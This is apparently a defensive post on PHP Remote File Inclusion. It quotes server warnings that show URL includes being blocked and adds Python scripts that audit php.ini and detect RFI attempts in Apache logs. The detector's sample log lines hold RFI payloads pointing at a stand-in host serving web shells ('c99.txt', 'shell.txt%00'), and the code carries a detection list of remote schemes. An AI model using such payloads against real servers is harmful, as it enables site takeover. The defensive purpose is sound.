RFI

Remote File Inclusion is the process of including remote files by exploiting vulnerable inclusion procedures implemented in the application. The vulnerability occurs, for example, when a page receives as input the path of the file that has to be included and that input is not properly sanitized, allowing an external URL to be injected. In PHP the usual pattern is include/require fed with a user-controlled parameter on a server that still honours URL wrappers.

Variables used in RFI attacks

Query to extract the variables from the logs:

 

RFI scanner in Perl

Scanner found in the logs.

 

Recommended configuration: "URL file-access is disabled in the server configuration"

Error the server reports when a script tries to include a file hosted on another server. The three warnings below come from a single request and show the protection working: PHP refuses the URL because remote wrappers are disabled for include/require (allow_url_include = Off; PHP versions before 5.2, which had no separate directive, governed this with allow_url_fopen), then reports that no wrapper is available for https:// and that the file could not be opened:

[Mon May 18 23:45:19 2009] [error] [client 127.0.0.1] PHP Warning: include_once() [function.include-once]: URL file-access is disabled in the server configuration in /var/www/htdocs/ot.php on line 3
[Mon May 18 23:45:19 2009] [error] [client 127.0.0.1] PHP Warning: include_once(https://localhost/tops.php) [function.include-once]: failed to open stream: no suitable wrapper could be found in /var/www/htdocs/ot.php on line 3
[Mon May 18 23:45:19 2009] [error] [client 127.0.0.1] PHP Warning: include_once() [function.include]: Failed opening 'https://localhost/tops.php' for inclusion (include_path='.:/usr/lib/php') in /var/www/htdocs/ot.php on line 3
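To check that a server is in the state the warnings above describe, here is a small audit script added as an example (it is not code from the original post). It parses a php.ini excerpt and reports whether include/require will accept URL targets. Both excerpts are constructed for the example; the parser and the fallback values for the two directives when they are absent (allow_url_fopen on, allow_url_include off) follow PHP's documented behaviour, and the "weak" excerpt is deliberately the state an RFI needs, not a recommended setting.

```python
"""Audit php.ini for the directives that make remote file inclusion possible.

Added example, not part of the original post. It parses a php.ini excerpt and
reports whether PHP will honour URL wrappers in include/require.
"""

# Constructed php.ini excerpts (not taken from any real server).
WEAK_INI = """\
[PHP]
; both switches on: include($_GET['page']) will fetch http:// targets
allow_url_fopen = On
allow_url_include = On
"""

HARDENED_INI = """\
[PHP]
; remote wrappers refused for include/require, which produces the
; "URL file-access is disabled in the server configuration" warning
allow_url_fopen = Off
allow_url_include = Off
"""

# Values PHP uses when the directive is not present in php.ini at all.
DEFAULTS = {"allow_url_fopen": "1", "allow_url_include": "0"}


def parse_php_ini(text):
    """Minimal php.ini reader: ';' starts a comment, [sections] are ignored,
    the last assignment wins, surrounding quotes are stripped. Directive
    names are case-insensitive, so keys are lower-cased."""
    directives = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        directives[key.lower()] = value.strip('"')
    return directives


def ini_bool(value):
    """Mirror PHP's reading of boolean ini values (1/On/Yes/True vs 0/Off/No/False/None)."""
    v = value.strip().lower()
    if v in ("1", "on", "yes", "true"):
        return True
    if v in ("0", "off", "no", "false", "none", ""):
        return False
    raise ValueError("not a PHP boolean ini value: %r" % value)


def effective_config(text):
    """Directives as PHP would see them: built-in defaults overridden by the file."""
    cfg = dict(DEFAULTS)
    cfg.update(parse_php_ini(text))
    return cfg


def audit_php_ini(text):
    """Return a list of findings; an empty list means remote includes are refused."""
    cfg = effective_config(text)
    findings = []
    if ini_bool(cfg["allow_url_include"]):
        findings.append("allow_url_include=On: include/require accept http://, ftp://, ... "
                        "targets, so an unsanitized include parameter is an RFI")
    if ini_bool(cfg["allow_url_fopen"]):
        findings.append("allow_url_fopen=On: fopen/file_get_contents can fetch URLs; "
                        "allow_url_include requires it, so turn it off too unless the "
                        "application genuinely needs remote fopen")
    return findings


def remote_include_possible(text):
    """True only when both switches are on, which is what an RFI payload needs."""
    cfg = effective_config(text)
    return ini_bool(cfg["allow_url_include"]) and ini_bool(cfg["allow_url_fopen"])


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print("%s: remote include possible = %s" % (label, remote_include_possible(ini)))
        for finding in audit_php_ini(ini):
            print("  - " + finding)
```

Run it against a real php.ini by reading the file into `audit_php_ini`; remember that `php -i` or `ini_get()` is the final word, since .htaccess and per-directory settings can override the global file.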

New RFI attack attempts

Query to detect includes in variables:

Include in different variables:

 

RFI attack attempts

Include requests during April and early May:

The attackers try to pass their own URLs in the variables the code uses for includes.
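The queries referenced in this post ran over the server logs; the following Python script, added here as an example and not part of the original post, does the equivalent over Apache access-log lines. For every request it inspects each query-string variable, flags values that begin with a URL scheme or a PHP stream wrapper (the shape of an RFI payload whatever the variable is called), and tallies the variable names and remote hosts used, which is what the "which variables" and "includes in different variables" queries were after. The log lines are constructed for the example: the client addresses, the 203.0.113.7 host and the libwww-perl user agent are assumptions, not observed data.

```python
"""Detect RFI attempts in Apache access logs.

Added example, not code from the original post. It looks at every query
parameter of every request and reports those whose value starts with a URL
scheme (http, https, ftp, ...) or a PHP stream wrapper (php, data, expect).
"""
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in Apache combined-log format (not real traffic).
# The localhost/tops.php payload mirrors the one in the PHP warning quoted
# earlier; the other hosts, clients and user agents are made up.
SAMPLE_LOG = """\
10.0.0.5 - - [18/May/2009:23:45:19 +0200] "GET /ot.php?page=https://localhost/tops.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [18/May/2009:23:45:20 +0200] "GET /index.php?include=http://203.0.113.7/c99.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.805"
10.0.0.5 - - [18/May/2009:23:45:21 +0200] "GET /modules/mod.php?path=ftp://203.0.113.7/shell.txt%00 HTTP/1.0" 404 210 "-" "libwww-perl/5.805"
192.0.2.9 - - [19/May/2009:00:01:02 +0200] "GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [19/May/2009:00:01:03 +0200] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

# The quoted request part of a combined-log line: method, target, protocol.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Schemes/wrappers a PHP include would resolve remotely (or as a stream).
REMOTE_SCHEMES = ("http", "https", "ftp", "ftps", "php", "data", "expect")


def rfi_attempts(log_text):
    """Return one record per query variable whose value is a URL-like payload,
    regardless of the variable name (page, include, path, ...)."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            scheme, sep, _rest = value.partition(":")
            if not sep or scheme.lower() not in REMOTE_SCHEMES:
                continue
            hits.append({
                "client": line.split(" ", 1)[0],
                "script": target.path,
                "variable": name,
                "scheme": scheme.lower(),
                "host": urlsplit(value).hostname or "",
                # %00 was the classic trick to cut off a suffix the script
                # appends (e.g. ".php") on PHP versions before 5.3.4.
                "nullbyte": "\x00" in value,
            })
    return hits


def variables_used(hits):
    """Which variable names the attackers tried to inject through."""
    return Counter(h["variable"] for h in hits)


def hosts_used(hits):
    """Where the included payloads were hosted."""
    return Counter(h["host"] for h in hits)


def report(log_text):
    """Human-readable summary of the attempts found in log_text."""
    hits = rfi_attempts(log_text)
    lines = ["%d RFI attempt(s)" % len(hits)]
    for h in hits:
        lines.append("  %s %s?%s=%s://%s%s" % (
            h["client"], h["script"], h["variable"], h["scheme"], h["host"],
            " (null byte)" if h["nullbyte"] else ""))
    lines.append("variables: " + ", ".join("%s=%d" % kv for kv in variables_used(hits).most_common()))
    lines.append("hosts: " + ", ".join("%s=%d" % kv for kv in hosts_used(hits).most_common()))
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(SAMPLE_LOG))
```

Feed a real access_log through `rfi_attempts` by reading the file into a string; the function deliberately keys on the value shape rather than on a fixed list of variable names, because the scanners seen in the post rotate through many names for the same payload.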